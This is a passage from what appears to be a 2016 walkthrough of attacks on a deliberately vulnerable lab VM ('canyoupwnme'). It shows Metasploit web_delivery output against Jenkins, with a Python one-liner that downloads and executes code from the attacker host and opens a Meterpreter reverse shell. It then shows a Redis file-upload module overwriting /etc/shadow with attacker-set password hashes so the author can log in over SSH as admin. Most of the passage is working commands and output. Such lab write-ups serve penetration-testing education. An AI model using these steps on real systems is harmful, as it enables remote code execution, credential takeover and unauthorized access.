   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Python


msf exploit(web_delivery) > exploit
[*] Exploit running as background job.

[*] Started reverse TCP handler on 10.1.1.130:4444
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8080/z7UgcWwtF
[*] Local IP: http://10.1.1.130:8080/z7UgcWwtF
[*] Server started.
[*] Run the following command on the target machine:
python -c "import urllib2; r = urllib2.urlopen('http://10.1.1.130:8080/z7UgcWwtF'); exec(r.read());"
[*] 10.1.1.128       web_delivery - Delivering Payload
[*] Sending stage (37475 bytes) to 10.1.1.128
[*] Meterpreter session 1 opened (10.1.1.130:4444 -> 10.1.1.128:36457) at 2016-05-26 07:41:18 -0400

msf exploit(web_delivery) >
msf exploit(web_delivery) > sessions -i 1

meterpreter > sysinfo
Computer     : canyoupwnme
OS           : Linux 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:18:00 UTC 2015
Architecture : i686
Meterpreter  : python/python
meterpreter > ifconfig

Now Jenkins has been compromised~~

Vector 5: Redis file upload attack

Create a shadow file to overwrite target machine:

1
2
3
4
5
6
7
...truncate...
debian-tor:*:16661:0:99999:7:::
admin:$6$9sirPrQg$keedQFIOyFrljiwfiVUcs4HDZzEnEDRm08p9s9Gc.IPEE75ipZ.6ZI0fWs5OLtcA4jXTtMAOmHy6iA2l7eksg1:16661:0:99999:7:::
user:$6$9sirPrQg$keedQFIOyFrljiwfiVUcs4HDZzEnEDRm08p9s9Gc.IPEE75ipZ.6ZI0fWs5OLtcA4jXTtMAOmHy6iA2l7eksg1:16661:0:99999:7:::
F4l13n:$6$dZlaWry7$JLdKZhM8F9jH7b4Nr86fOZHVd.1RTQ3VoqCCAP3iEv0rSJL8HVZ0saN89l/MdWjmbQ8Mskx2Q4g1u1kfu4AZI/:16661:0:99999:7:::
ftpuser:!:16679:0:99999:7:::
...truncate...

Use metasploit payload to upload our shadow file to overwrite target machine.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Module options (auxiliary/scanner/redis/file_upload):

   Name                    Current Setting        Required  Description
   ----                    ---------------        --------  -----------
   DISABLE_RDBCOMPRESSION  true                   yes       Disable compression when saving if found to be enabled
   LocalFile               /var/www/html/shadow_  no        Local file to be uploaded
   Password                foobared               no        Redis password for authentication test
   RHOSTS                  10.1.1.128             yes       The target address range or CIDR identifier
   RPORT                   6379                   yes       The target port
   RemoteFile              /etc/shadow            no        Remote file path
   THREADS                 1                      yes       The number of concurrent threads

msf auxiliary(file_upload) > exploit

[+] 10.1.1.128:6379 -- saved 1103 bytes inside of redis DB at /etc/shadow
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(file_upload) >

and then SSH login to user or admin with the password we set.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
root@kali:~# ssh -p 1322 admin@10.1.1.128


  G:                ,;
  E#,    :        f#i                        .Gt  t    j.
  E#t  .GE      .E#t                        j#W:  Ej   EW,
  E#t j#K;     i#W,     t      .DD.       ;K#f    E#,  E##j
  E#GK#f      L#D.      EK:   ,WK.      .G#D.     E#t  E###D.
  E##D.     :K#Wfff;    E#t  i#D       j#K;       E#t  E#jG#W;
  E##Wi     i##WLLLLt   E#t j#f      ,K#f   ,GD;  E#t  E#t t##f
  E#jL#D:    .E#L       E#tL#i        j#Wi   E#t  E#t  E#t  :K#E:
  E#t ,K#j     f#E:     E#WW,          .G#D: E#t  E#t  E#KDDDD###i
  E#t   jD      ,WW;    E#K:             ,K#fK#t  E#t  E#f,t#Wi,,,
  j#t            .D#;   ED.                j###t  E#t  E#t  ;#W:  
   ,;              tt   t                   .G#t  E#t  DWi   ,KK:
                                              ;;  ,;.

                                                   by canyoupwn.me

admin@10.1.1.128's password: 
Permission denied, please try again.
admin@10.1.1.128's password:
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sat May 28 15:45:06 EEST 2016

  System load:  0.0               Processes:           174
  Usage of /:   32.5% of 6.50GB   Users logged in:     1
  Memory usage: 30%               IP address for eth0: 10.1.1.128
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

151 packages can be updated.
79 updates are security updates.

Last login: Sat May 28 15:44:57 2016 from 10.1.1.130
admin@canyoupwnme:~$ exit
logout
Connection to 10.1.1.128 closed.

Now I can login as admin!

2016-05-29 00:26:08 -0400